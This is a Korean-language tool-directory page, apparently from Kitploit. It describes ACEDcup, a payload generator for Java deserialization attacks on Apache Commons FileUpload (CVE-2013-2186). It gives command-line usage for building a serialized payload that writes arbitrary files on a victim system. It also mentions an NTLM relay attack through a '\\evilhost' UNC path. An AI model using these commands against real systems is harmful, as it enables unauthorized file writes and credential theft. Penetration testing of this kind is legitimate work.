Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
ACEDcup — Java Binary Deserialization 공격과 Commons FileUpload(CVE-2013-2186)를 위한 페이로드 생성기 | Kitploit
도구/GitHubGitHub/grrrdog/acedcup
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration Testing
GitHubgrrrdog/acedcup

ACEDcup

Java Binary Deserialization 공격과 Commons FileUpload(CVE-2013-2186)를 위한 페이로드 생성기

저장소 보기
371410년 전Kitploit 검토 완료

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

ACEDcup

ACEDcup 도구는 Java 바이너리 역직렬화 공격(ACED)을 위한 페이로드 생성기입니다.

Apache Commons FileUpload 버전 <= 1.3 (CVE-2013-2186) 및 Oracle JDK 버전 < 7u40 대상

이 공격은 라이브러리나 Java의 최신 버전에서도 작동합니다. 모든 디렉토리에 모든 콘텐츠를 업로드할 수 있지만, 이 상황에서는 파일 이름(예: upload_f71d3547_72ed_4ae1_90fe_0d319115cd42_00000000.tmp)을 제어할 수 없습니다. 하지만 일부 경우에는 유용할 수 있습니다.

또한 대상이 Windows OS인 경우 NTLM-릴레이/스니핑 공격(\\evilhost\any\path 사용)을 수행할 수 있습니다.

사용법

root@kitploit:~
  1)At first, we create a serialized payload:
  java -jar aced_cup.jar /path/payload /path/target /path/out 1
  
  /path/payload - a path to a file with your payload
  /path/target - a path to a file that will be created in your victim (this will be stored in the serialized payload)
  /path/out - a path to a file with serialized payload
  0 - turn off null-byte ending if you attack a patched system (with null-byte- by default)

  2)Then we set the serialized payload to the serialized reader (if we want to test the vuln on your host) :
  java -jar ser_reader serialized_payload.txt
  
  ser_reader tries to deserialize the payload and because of a vulnerability in it's library, it creates a new file in the directory specified.

예제

java -jar aced_cup.jar D:\\cup_exploit\\payload.txt /home/user/test/any_name.txt D:\\cup_exploit\\serialized_payload.txt

```java -jar ser_reader D:\cup_exploit\serialized_payload.txt````

도구 다운로드